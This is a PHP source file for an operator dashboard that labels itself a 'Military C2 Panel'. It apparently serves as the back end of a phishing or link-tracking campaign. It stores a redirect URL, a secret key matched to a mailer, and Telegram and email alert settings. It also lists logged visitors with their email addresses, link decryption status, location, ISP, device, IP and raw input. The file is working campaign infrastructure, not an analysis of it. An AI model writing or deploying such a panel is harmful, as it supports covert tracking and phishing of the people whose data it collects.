<?php
require_once __DIR__ . '/config.php';
session_start();

// ========== Login ==========
if (isset($_POST['login'])) {
    if ($_POST['user'] === $dashboard_user && $_POST['pass'] === $dashboard_pass) {
        $_SESSION['logged_in'] = true;
        header('Location: dashboard.php');
        exit;
    } else {
        $error = "Invalid credentials";
    }
}

if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: dashboard.php");
    exit;
}

if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <title>C2 Login</title>
        <style>
            body { background:#0a0e0a; color:#0f0; font-family:monospace; display:flex; justify-content:center; align-items:center; height:100vh; margin:0; }
            .box { background:#111; border:1px solid #0f0; padding:40px; width:320px; }
            input { width:100%; padding:10px; margin:8px 0; background:#000; border:1px solid #0f0; color:#0f0; }
            button { width:100%; padding:12px; background:#0f0; color:#000; border:none; font-weight:bold; cursor:pointer; }
        </style>
    </head>
    <body>
        <div class="box">
            <h2>⚡ C2 ACCESS</h2>
            <?php if (isset($error)) echo "<p style='color:red'>" . htmlspecialchars($error) . "</p>"; ?>
            <form method="POST">
                <input type="text" name="user" placeholder="Username" required>
                <input type="password" name="pass" placeholder="Password" required>
                <button type="submit" name="login">LOGIN</button>
            </form>
        </div>
    </body>
    </html>
    <?php
    exit;
}

// ========== Handle Actions ==========
$msg = '';

if (isset($_GET['msg'])) {
    $msg = $_GET['msg'];
}

if (isset($_POST['clear_logs'])) {
    file_put_contents(__DIR__ . '/visits.log', '');
    header('Location: dashboard.php?msg=' . urlencode('Logs cleared'));
    exit;
}

if (isset($_POST['save_settings'])) {
    $config_file = __DIR__ . '/config.php';

    $enable_email    = isset($_POST['enable_email']) ? 'true' : 'false';
    $enable_telegram = isset($_POST['enable_telegram']) ? 'true' : 'false';

    $new_config  = "<?php\n";
    $new_config .= "// config.php - Auto generated by dashboard\n\n";
    $new_config .= "\$redirect_base = \"" . addslashes(trim($_POST['redirect_base'] ?? '')) . "\";\n";
    $new_config .= "\$secret_key = \"" . addslashes(trim($_POST['secret_key'] ?? '')) . "\";\n\n";
    $new_config .= "\$enable_email_notify = " . $enable_email . ";\n";
    $new_config .= "\$notify_email = \"" . addslashes(trim($_POST['notify_email'] ?? '')) . "\";\n\n";
    $new_config .= "\$enable_telegram_notify = " . $enable_telegram . ";\n";
    $new_config .= "\$telegram_bot_token = \"" . addslashes(trim($_POST['telegram_bot_token'] ?? '')) . "\";\n";
    $new_config .= "\$telegram_chat_id = \"" . addslashes(trim($_POST['telegram_chat_id'] ?? '')) . "\";\n\n";
    $new_config .= "\$dashboard_user = \"" . addslashes($dashboard_user) . "\";\n";
    $new_config .= "\$dashboard_pass = \"" . addslashes($dashboard_pass) . "\";\n";

    if (!file_exists($config_file)) {
        $msg = "ERROR: config.php not found";
    } elseif (!is_writable($config_file)) {
        $msg = "ERROR: config.php is not writable. Run: chmod 666 config.php";
    } else {
        $written = file_put_contents($config_file, $new_config);
        if ($written === false) {
            $msg = "ERROR: Failed to write config.php";
        } else {
            // Force clean reload so form shows new values
            header('Location: dashboard.php?msg=' . urlencode('Settings saved successfully'));
            exit;
        }
    }
}

// Always load latest config values for display
require __DIR__ . '/config.php';
?>
<!DOCTYPE html>
<html>
<head>
    <title>Military C2 Panel</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        :root {
            --bg: #0a0e0a;
            --panel: #111811;
            --border: #1f2a1f;
            --green: #00ff41;
            --dim: #0d7a57;
            --amber: #ffb84d;
            --red: #ff3b3b;
        }
        * { box-sizing: border-box; margin: 0; padding: 0; }
        body {
            background: var(--bg);
            color: var(--green);
            font-family: "JetBrains Mono", "Courier New", monospace;
            font-size: 13px;
            line-height: 1.5;
        }
        header {
            background: #0d120d;
            border-bottom: 1px solid var(--border);
            padding: 15px 25px;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        header h1 { font-size: 18px; letter-spacing: 2px; }
        .logout { color: var(--amber); text-decoration: none; }
        .container { max-width: 1400px; margin: 0 auto; padding: 20px; }
        .grid { display: grid; grid-template-columns: 1fr 1fr; gap: 20px; margin-bottom: 25px; }
        @media (max-width: 900px) { .grid { grid-template-columns: 1fr; } }
        .panel {
            background: var(--panel);
            border: 1px solid var(--border);
            padding: 20px;
        }
        .panel h2 {
            font-size: 14px;
            letter-spacing: 1px;
            margin-bottom: 15px;
            color: var(--amber);
            border-bottom: 1px solid var(--border);
            padding-bottom: 8px;
        }
        label { display: block; margin: 10px 0 4px; color: #8f8; }
        input[type=text], input[type=password] {
            width: 100%;
            padding: 9px 12px;
            background: #0a0e0a;
            border: 1px solid var(--border);
            color: var(--green);
            font-family: inherit;
        }
        .toggle {
            display: flex;
            align-items: center;
            gap: 10px;
            margin: 12px 0;
        }
        .toggle input { width: auto; }
        button, .btn {
            background: var(--green);
            color: #000;
            border: none;
            padding: 10px 18px;
            font-weight: bold;
            cursor: pointer;
            font-family: inherit;
            margin-top: 10px;
            margin-right: 8px;
        }
        button:hover { filter: brightness(1.1); }
        .btn-danger { background: var(--red); color: white; }
        .btn-amber { background: var(--amber); color: #000; }
        .msg {
            background: #0d2a0d;
            border: 1px solid var(--green);
            padding: 10px 15px;
            margin-bottom: 20px;
            color: var(--green);
        }
        .msg-error {
            background: #2a0d0d;
            border: 1px solid var(--red);
            color: var(--red);
        }
        table {
            width: 100%;
            border-collapse: collapse;
            font-size: 12px;
        }
        th {
            background: #0d150d;
            color: var(--amber);
            text-align: left;
            padding: 10px 8px;
            border-bottom: 1px solid var(--border);
        }
        td {
            padding: 8px;
            border-bottom: 1px solid #1a221a;
            vertical-align: top;
        }
        tr:hover { background: #0f160f; }
        .status-success { color: #00ff41; }
        .status-failed { color: #ff3b3b; }
        .small { font-size: 11px; color: #6a8; }
        .logs-panel { grid-column: 1 / -1; }
    </style>
</head>
<body>
<header>
    <h1>⚡ MILITARY C2 PANEL</h1>
    <div>
        <span class="small">Logged in as <?php echo htmlspecialchars($dashboard_user); ?></span>
        &nbsp;&nbsp;
        <a href="?logout=1" class="logout">LOGOUT</a>
    </div>
</header>
<div class="container">
    <?php if ($msg !== ''): ?>
        <div class="msg <?php echo (strpos($msg, 'ERROR') === 0) ? 'msg-error' : ''; ?>">
            <?php echo htmlspecialchars($msg); ?>
        </div>
    <?php endif; ?>

    <div class="grid">
        <!-- SETTINGS PANEL -->
        <div class="panel">
            <h2>⚙ SETTINGS / CONFIG</h2>
            <form method="POST">
                <label>Redirect Base URL</label>
                <input type="text" name="redirect_base" value="<?php echo htmlspecialchars($redirect_base ?? ''); ?>">

                <label>Secret Key (must match mailer)</label>
                <input type="text" name="secret_key" value="<?php echo htmlspecialchars($secret_key ?? ''); ?>">

                <label>Notification Email</label>
                <input type="text" name="notify_email" value="<?php echo htmlspecialchars($notify_email ?? ''); ?>">

                <label>Telegram Bot Token</label>
                <input type="text" name="telegram_bot_token" value="<?php echo htmlspecialchars($telegram_bot_token ?? ''); ?>">

                <label>Telegram Chat ID</label>
                <input type="text" name="telegram_chat_id" value="<?php echo htmlspecialchars($telegram_chat_id ?? ''); ?>">

                <div class="toggle">
                    <input type="checkbox" name="enable_email" id="en_email" <?php echo !empty($enable_email_notify) ? 'checked' : ''; ?>>
                    <label for="en_email" style="margin:0">Enable Email Notifications</label>
                </div>

                <div class="toggle">
                    <input type="checkbox" name="enable_telegram" id="en_tg" <?php echo !empty($enable_telegram_notify) ? 'checked' : ''; ?>>
                    <label for="en_tg" style="margin:0">Enable Telegram Notifications</label>
                </div>

                <button type="submit" name="save_settings">💾 SAVE SETTINGS</button>
            </form>
        </div>

        <!-- ACTIONS PANEL -->
        <div class="panel">
            <h2>🛡 QUICK ACTIONS</h2>
            <form method="POST" onsubmit="return confirm('Clear all logs? This cannot be undone.');">
                <button type="submit" name="clear_logs" class="btn-danger">🗑 CLEAR ALL LOGS</button>
            </form>
            <br>
            <p class="small">Current status:</p>
            <p>Email Notify: <strong><?php echo !empty($enable_email_notify) ? 'ON' : 'OFF'; ?></strong></p>
            <p>Telegram Notify: <strong><?php echo !empty($enable_telegram_notify) ? 'ON' : 'OFF'; ?></strong></p>
            <p class="small" style="margin-top:15px">Total logs:
                <?php
                $log_file = __DIR__ . '/visits.log';
                $count = file_exists($log_file) ? count(file($log_file)) : 0;
                echo $count;
                ?>
            </p>
        </div>
    </div>

    <!-- LOGS -->
    <div class="panel logs-panel">
        <h2>📋 VISITOR LOGS (Latest First)</h2>
        <div style="overflow-x:auto;">
            <table>
                <thead>
                    <tr>
                        <th>Time</th>
                        <th>Email</th>
                        <th>Decrypt</th>
                        <th>Country / City</th>
                        <th>ISP</th>
                        <th>OS / Browser</th>
                        <th>Device</th>
                        <th>IP</th>
                        <th>Raw Input</th>
                    </tr>
                </thead>
                <tbody>
                <?php
                $log_file = __DIR__ . '/visits.log';
                $logs = file_exists($log_file) ? array_reverse(file($log_file)) : [];
                if (empty($logs)) {
                    echo '<tr><td colspan="9" style="text-align:center;padding:30px;color:#555">No logs yet</td></tr>';
                }
                foreach ($logs as $line) {
                    $d = json_decode(trim($line), true);
                    if (!$d) continue;
                    $status_class = ($d['decrypt_status'] ?? '') === 'success' ? 'status-success' : 'status-failed';
                    $decrypt_info = ($d['decrypt_status'] ?? 'n/a') . ' / ' . ($d['decrypt_method'] ?? '');
                    ?>
                    <tr>
                        <td><?php echo htmlspecialchars($d['time'] ?? ''); ?></td>
                        <td><strong><?php echo htmlspecialchars($d['email'] ?? ''); ?></strong></td>
                        <td class="<?php echo $status_class; ?>"><?php echo htmlspecialchars($decrypt_info); ?></td>
                        <td>
                            <?php echo htmlspecialchars($d['country'] ?? ''); ?><br>
                            <span class="small"><?php echo htmlspecialchars(($d['city'] ?? '') . ', ' . ($d['region'] ?? '')); ?></span>
                        </td>
                        <td><?php echo htmlspecialchars($d['isp'] ?? ''); ?></td>
                        <td>
                            <?php echo htmlspecialchars($d['os'] ?? ''); ?><br>
                            <span class="small"><?php echo htmlspecialchars($d['browser'] ?? ''); ?></span>
                        </td>
                        <td><?php echo htmlspecialchars($d['device'] ?? ''); ?></td>
                        <td><?php echo htmlspecialchars($d['ip'] ?? ''); ?></td>
                        <td class="small" style="max-width:180px;word-break:break-all;">
                            <?php echo htmlspecialchars($d['raw_input'] ?? $d['input'] ?? ''); ?>
                        </td>
                    </tr>
                <?php } ?>
                </tbody>
            </table>
        </div>
    </div>
</div>
</body>
</html>